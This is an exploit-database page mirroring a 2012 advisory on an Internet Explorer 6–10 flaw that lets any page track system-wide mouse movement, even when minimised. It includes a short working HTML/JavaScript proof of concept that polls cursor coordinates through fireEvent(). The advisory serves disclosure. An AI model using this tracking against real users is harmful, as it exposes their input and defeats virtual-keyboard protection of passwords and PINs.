Lucene search
K

Microsoft Internet Explorer 6-10 Mouse Tracking

🗓️ 12 Dec 2012 00:00:00Reported by Nick JohnsonType 
zdt
 zdt
🔗 0day.today👁 25 Views

Unprivileged attackers can track mouse movements on any Microsoft Internet Explorer 6-10 page, even when unfocused or minimised. Compromises virtual keyboards and keypads

Code
Summary: Unprivileged attackers can track your system-wide mouse
movements from any IE page, even when the page is unfocused or
minimised.
Package: Microsoft Internet Explorer
Affected: Tested on versions 6–10
 
 
Introduction
-----------------
A security vulnerability in Internet Explorer, versions 6–10, allows
your mouse cursor to be tracked anywhere on the screen, even if the
Internet Explorer window is inactive, unfocused or minimised. The
vulnerability is notable because it compromises the security of
virtual keyboards and virtual keypads.
 
As a user of Internet Explorer, your mouse movements can be recorded
by an attacker even if you are security conscious and you never
install any untoward software. An attacker can get access to your
mouse movements simply by buying a display ad slot on any webpage you
visit. This is not restricted to lowbrow porn and file-sharing sites.
Through today’s ad exchanges, any site from YouTube to the New York
Times is a possible attack vector. Indeed, the vulnerability is
already being exploited by at least two display ad analytics companies
across billions of webpage impressions each month. As long as the page
with the exploitative advertiser’s ad stays open—even if you push the
page to a background tab or, indeed, even if you minimise Internet
Explorer—your mouse cursor can be tracked across your entire display.
 
 
Details of the vulnerability
-----------------
Internet Explorer’s event model populates the global Event object with
some attributes relating to mouse events, even in situations where it
should not. Combined with the ability to trigger events manually using
the fireEvent() method, this allows JavaScript in any webpage (or in
any iframe within any webpage) to poll for the position of the mouse
cursor anywhere on the screen and at any time—even when the tab
containing the page is not active, or when the Internet Explorer
window is unfocused or minimized. The fireEvent() method also exposes
the status of the control, shift and alt keys.
 
Affected properties of the Event object are altKey, altLeft, clientX,
clientY, ctrlKey, ctrlLeft, offsetX, offsetY, screenX, screenY,
shiftKey, shiftLeft, x and y.
 
 
Exploit
-----------------
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <title>Exploit Demo</title>
  <script type="text/javascript">
    window.attachEvent("onload", function() {
      var detector = document.getElementById("detector");
      detector.attachEvent("onmousemove", function (e) {
        detector.innerHTML = e.screenX + ", " + e.screenY;
      });
      setInterval(function () {
        detector.fireEvent("onmousemove");
      }, 100);
    });
  </script>
</head>
<body>
  <div id="detector"></div>
</body>
</html>
 
 
Demonstration
-----------------
A demonstration of the security vulnerability may be seen here:
http://iedataleak.spider.io/demo
 
 
The implications for virtual keyboards and virtual keypads
-----------------
We have created a game to illustrate how easily this security
vulnerability in Internet Explorer may be exploited to compromise the
security of virtual keyboards and virtual keypads. The game may be
found at http://iedataleak.spider.io/

#  0day.today [2018-02-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Dec 2012 00:00Current
7.1High risk
Vulners AI Score7.1
25